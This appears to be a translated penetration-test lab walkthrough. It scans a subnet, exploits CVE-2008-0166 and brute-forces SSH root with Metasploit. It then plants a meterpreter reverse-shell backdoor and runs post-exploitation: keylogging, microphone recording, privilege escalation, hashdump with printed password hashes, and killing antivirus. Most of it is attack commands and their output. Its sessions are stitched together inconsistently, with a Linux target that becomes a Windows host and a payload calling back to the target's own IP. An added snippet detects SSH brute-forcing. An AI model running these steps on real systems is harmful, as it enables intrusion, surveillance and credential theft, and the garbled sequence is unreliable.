I. Information gathering:
1. Generate a password dictionary according to the chosen conditions:
Select the characters for the conditions
Generate the corresponding dictionary
Scan the corresponding subnet for live hosts:
nmap -sP 192.168.183.0/24
Work out which host on this subnet is the target machine. This host's IP is 183.129, and the gateway and servers occupy 183.1, 183.2 and 183.254, which leaves 2 IPs; since two network adapters are enabled, we take the target machine's IP to be 183.132 or 183.133.
Test whether it can be reached: it can.
Check which ports and services are open on 183.132
If any of the following services has a vulnerability, we can attack it.
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
3306/tcp open mysql
5432/tcp open postgresql
8009/tcp open ajp13
8180/tcp open unknown
2. Use Nessus to scan 192.168.183.132 for vulnerabilities:
Fill in the relevant information
Start the scan:
Analyze the results:
Description
The remote SSH host key has been generated on a Debian or Ubuntu system which contains a bug in the random number generator of its OpenSSL library.
The problem is due to a Debian packager removing nearly all sources of entropy in the remote version of OpenSSL.
An attacker can easily obtain the private part of the remote key and use this to set up decipher the remote session or set up a man in the middle attack.
Solution
Consider all cryptographic material generated on the remote host to be guessable. In particuliar, all SSH, SSL and OpenVPN key material should be re-generated.
There are 2 high-risk vulnerabilities here; we take SSH as the example for the penetration.
The vulnerability ID found is: CVE-2008-0166
3. Exploitation:
Because CVE-2008-0166 cannot be used directly on BT5, the corresponding files must be downloaded first
root@bt:~# /pentest/exploits/exploitdb/platforms/linux/remote/ openssl
bash: /pentest/exploits/exploitdb/platforms/linux/remote/: is a directory
root@bt:~# cd /pentest/exploits/exploitdb/platforms/linux/remote/
root@bt:/pentest/exploits/exploitdb/platforms/linux/remote# python 5720.py /root/rsa/2048/ 192.168.183.132
-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
./exploit.py <dir> <host> <user> [[port] [threads]]
<dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash
<host>: The victim host
<user>: The user of the victim host
[port]: The SSH port of the victim host (default 22)
[threads]: Number of threads (default 4) Too big numer is bad
root@bt:/pentest/exploits/exploitdb/platforms/linux/remote# python 5720.py /root/rsa/2048/ 192.168.183.132 root
Use an MSF auxiliary module to crack passwords on 192.168.183.132:
Search for the SSH attack modules
msf > search ssh
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE pass.txt
PASS_FILE => pass.txt
msf auxiliary(ssh_login) > set THREADS 50
THREADS => 50
msf auxiliary(ssh_login) > run
Analyze the results:
Finally an account with username root and password ubuntu was found that can log in.
Log-in test using Xshell 5:
Passed
Plant the backdoor:
Build the backdoor and generate the backdoor client:
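As an added defensive example (not part of the original lab notes): the ssh_login run above with 50 threads leaves a burst of failed logins in the target's auth.log. The Python below parses constructed sample sshd log lines (the host name, timestamps and the source address 192.168.183.129 are assumptions) and flags a source exceeding a threshold of failures inside a short window, noting whether a login from it then succeeded.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines; not taken from the original write-up.
SAMPLE_AUTH_LOG = """\
May  3 10:15:01 metasploitable sshd[4011]: Failed password for root from 192.168.183.129 port 50122 ssh2
May  3 10:15:01 metasploitable sshd[4012]: Failed password for root from 192.168.183.129 port 50123 ssh2
May  3 10:15:02 metasploitable sshd[4013]: Failed password for invalid user admin from 192.168.183.129 port 50124 ssh2
May  3 10:15:02 metasploitable sshd[4014]: Failed password for root from 192.168.183.129 port 50125 ssh2
May  3 10:15:03 metasploitable sshd[4015]: Failed password for root from 192.168.183.129 port 50126 ssh2
May  3 10:15:03 metasploitable sshd[4016]: Accepted password for root from 192.168.183.129 port 50127 ssh2
May  3 10:20:45 metasploitable sshd[4099]: Accepted publickey for msfadmin from 192.168.183.1 port 40001 ssh2
"""

# Matches both "Failed password for <user>" and "... for invalid user <user>".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse(log_text, year=2024):
    """Return (timestamp, result, user, source_ip) tuples; syslog lacks a year."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime("%d %s" % (year, m["ts"]), "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def find_bruteforce(events, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failures inside window_seconds and
    record whether that source later logged in successfully."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[3]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e[1] == "Failed"]
        for i in range(len(fails)):
            j = i  # extend the window starting at failure i
            while j < len(fails) and (fails[j][0] - fails[i][0]).total_seconds() <= window_seconds:
                j += 1
            if j - i >= threshold:
                last_fail = fails[j - 1][0]
                alerts[ip] = {
                    "failures": j - i,
                    "users": sorted({e[2] for e in fails[i:j]}),
                    "success_after_burst": any(e[1] == "Accepted" and e[0] >= last_fail for e in evs),
                }
                break
    return alerts
```

A hit with success_after_burst set is the case shown in this write-up (root/ubuntu found by the dictionary), and is the one to escalate first.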
msfpayload linux/x86/meterpreter/reverse_tcp lhost=192.168.183.132 lport=5555 x>test6
Upload the backdoor to the target machine 192.168.183.132 via Xshell and execute it:
root@metasploitable:~# ./test6
Configure the backdoor server side
msf exploit(handler) > set LHOST 192.168.183.129
LHOST => 192.168.183.129
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.183.129:5555
[*] Starting the payload handler...
Use the backdoor for post-exploitation
meterpreter >
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
meterpreter > keyscan_dump
Dumping captured keystrokes...
meterpreter >
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
Capture audio
meterpreter > record_mic -d 10 (record for 10 s)
meterpreter > shell (enter the target's shell)
Download pictures
meterpreter > migrate 1632
[*] Migrating to 1632...
[*] Migration completed successfully.
meterpreter >
meterpreter > download calc.exe
[*] downloading: calc.exe -> calc.exe
[*] downloaded : calc.exe -> calc.exe
meterpreter > getpid
Current pid: 1024
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeAssignPrimaryTokenPrivilege
meterpreter > getsystem
...got system (via technique 1).
meterpreter > hashdump
Administrator:500:a9a1d510b01177d1aad3b435b51404ee:afc44ee7351d61d00698796da06b1ebf:::
ASPNET:1008:b4df3d6cb6929cc09cb07285b13aca78:9c8be841d72dbd132d22477ff8b7e9d3:::
dg:1009:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_ROOT-TVI862UBEH?:1004:7d730a3707abd506a84a60b453cab938:42fc0d1aaf3eeda15e9c5e64322a29e1:::
IWAM_ROOT-TVI862UBEH:1006:72f7503120401ee0845a72ccde743c03:cb7625dafeb8908bb37b5730d7d36867:::
SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:ac4f5c3f7b7a2bde31f8de9ce3fd1657:::
meterpreter > run post/windows/gather/checkvm
[*] Checking if ROOT-TVI862UBEH is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter > run get_application_list
Installed Applications
======================
Name Version
---- -------
Windows Installer 3.1 (KB893803) 3.1
WinRAR 4.01 (32-bit) 4.01.0
Oracle Data Provider for .NET Help 10.2.000
Kingview Driver 6.53
Kingview 6.53 6.53
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*] The following command was not found: firewall show opmode.
[*] Checking DEP Support Policy...
meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
Channels:
meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
meterpreter > execute -f cmd.exe -c
Process 2212 created.
Channel 4 created.
meterpreter > channel -w 9
meterpreter > channel -l
Id Class Type
-- ----- ----
2 3 stdapi_process
3 3 stdapi_process
4 3 stdapi_process
meterpreter > channel -w 2
Enter data followed by a '.' on an empty line:
^C[-] Error running command channel: Interrupt
meterpreter > channel -w 9
[-] Invalid channel identifier specified.
meterpreter > channel -w 3
meterpreter > interact 2
Interacting with channel 2...